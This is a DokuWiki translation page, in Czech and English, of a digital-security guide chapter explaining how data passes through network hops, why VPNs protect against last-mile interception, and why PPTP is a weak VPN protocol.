Cesta vašich dat k požadovanému serveru a zpět do vašeho počítače nebo mobilního zařízení není tak přímočará, jak se může zdát. Předpokládejme, že jste připojen k domácí bezdrátové síti a otevřete stránku wikipedia.org. Cesta vašeho požadavku (dat) se bude skládat z několika prostředních bodů, neboli „skoků“, v terminologii síťové architektury. Na každém z těchto skoků (pravděpodobně jich bude více než 5) mohou být vaše data prohlédnuty, zkopírovány a případně upraveny. Například:

Hodnocení překladu
next_ghost(Správný, ale potřebuje přeformulovat) Ve třetí větě by místo "požadavku" bylo lepší "dotazu" a "hop" přeložit podle slovníčku pojmů. V předposlední větě je špatně shoda přísudku s podmětem. Jinak OK.


The way your data makes it to the desired server and back to your laptop computer or a mobile device is not as straightforward as it might seem. Suppose you are connected to a wireless network at home and opening a wikipedia.org page. The path your request (data) takes will consist of multiple middle points, or „hops“ in network-architect terminology. At each of these hops (likely to be more then 5) your data can be scooped, copied and potentially modified. For example:

  • Your wireless network (your data can be sniffed from the air)
  • Your ISP (in most countries they are obliged to keep detailed logs of user activity)
  • Internet Exchange Point (IXP) somewhere on another continent (usually more secure then any other hop)
  • ISP of the hosting company that hosts the site (is probably keeping logs)
  • Internal network to which the server is connected
  • And multiple hops between…

Any person with physical access to the computers or the networks which are on the way from you to the remote server, intentionally or not, can collect and reveal the data that's passing from you to the remote server and back. This is especially true for the few last leaps that an internet connection makes to reach a user - so called 'last mile' situations. That includes domestic and public wireless or wired networks, telephone and mobile networks, networks in libraries, homes, schools, hotels. Your ISP can not be considered a safe, or 'data-neutral' instance either. In many countries state agencies do not require a warrant to access your data, and there is always the risk of intrusion by paid attackers working for adversaries with deep pockets.

VPN - a Virtual Private Network - is a solution for this 'last-mile' leakage. VPN is a technology that allows the creation of a virtual network on top of an existing infrastructure. Such a VPN network operates using the same protocols and standards as the underlying physical network. Programs and operating systems use it transparently, as if it were a separate network connection. But its topology - how network nodes (you, the VPN server and, potentially, other members or services available on VPN) are interconnected in relation to the physical space - is entirely redefined.

Imagine that instead of having to entrust your data to a series of middle-man (your local network, ISP, the state) you have the choice to instead pass it via a server of a trusted VPN (recommendation or research can help here). Your data will start its journey here to the remote location. VPN allows you to recreate your local and geo-political context altogether - from the moment your data leaves your computer and gets into the VPN network it is fully secured with TLS/SSL type encryption. As such it will appear as random noise to any node who might be spying after you. It is as if your data were traveling inside an independent titanium-alloy pipe, unbreakable all the way from your laptop to the VPN server. Of course one could argue that eventually, once your data is outside the safe harbour of VPN, it becomes vulnerable again, but this is only partially true. Once your data exits the VPN server it is far away from you - beyond the reach of creeps sniffing on the local wireless network, your venal ISP or a government obsessed with anti-terrorism laws. A serious VPN provider will have their servers installed at a high-security Internet exchange location, rendering any physical human access, tapping or logging a difficult task.

„Today everything you do on the Internet is monitored and we want to change that. With our fast VPN service you get totally anonymous on the Internet. It's also possible to surf censored web sites, that your school, ISP, work or country are blocking. [DarkVPN] will not only help people to surf anonymously, it also helps people in countries like China to be able to surf censored web pages. Which is your democratic right. DarknetVPN gives all VPN users an anonymous IP address. All electronic tracks will end up with us. We do not save any log files in order to achieve maximum anonymity. With us you always surfing anonymously, secure and encrypted.“

Another interesting and often underrated features of VPN is encoded in its name - besides being Virtual and Private it is also a Network. VPN allows not only connection via the VPN server to the rest of the world but also communication with other members of the same VPN network, without ever having to leave the safety of encrypted space. Through this functionality Virtual Private Network becomes something like a DarkNet (in a broader sense of the definition) - a network isolated from the Internet and inaccessible to uninvited guests. A connection to VPN server, and thus the private network it facilitates, require a key or a certificate, and so only „invited“ users are allowed. There is no chance that an Internet stranger can gain access to what's on a VPN without enrolling as a user or stealing someone's keys. While not usually referred to as such, any corporate Intranet type of network is technically a DarkNet too.

„A virtual private network (VPN) is a technology for using the Internet or another intermediate network to connect computers to isolated remote computer networks that would otherwise be inaccessible..“ (http://en.wikipedia.org/wiki/Virtual_private_network)

Many commercial VPN providers stress the anonymity that their service provides. Quoting Ipredator.org page (a VPN service started by the people behind The Pirate Bay project): „You'll exchange the IP address you get from your ISP for an anonymous IP address. You get a safe/encrypted connection between your computer and the Internet“. Indeed, when you access the Internet via a VPN connection it does appear as if the connection is originating from the IP address of IPredator servers.

„You'll exchange the IP address you get from your ISP for an anonymous IP address. You get a safe/encrypted connection between your computer and the Internet.“ (https://www.ipredator.se)


Just because you are using a VPN doesn't mean your encryption method is entirely secure. It's important to be aware of the risks when signing up with a VPN service provider as they provide a connection that is breakable. If you really need a high level of security then don't use the connection type PPTP. PPTP is one of the older VPN technologies. While PPTP is known to use weaker encryption than either L2TP/IPSec or OpenVPN, it may still be useful for bypassing Internet blocking and give some level of encryption. The client software is conveniently built into most versions of Microsoft Windows, Apple, Linux computers and even mobile phones. It is very easy to setup. A PPTP VPN session can be broken using a Cloud Cracker service for very little money.

encs/cph/vpn.txt · Poslední úprava: 2013/03/31 15:05 (upraveno mimo DokuWiki)
Kromě míst, kde je explicitně uvedeno jinak, je obsah této wiki licencován pod následující licencí: CC Attribution-Share Alike 3.0 Unported
Recent changes RSS feed Donate Powered by PHP Valid XHTML 1.0 Valid CSS Driven by DokuWiki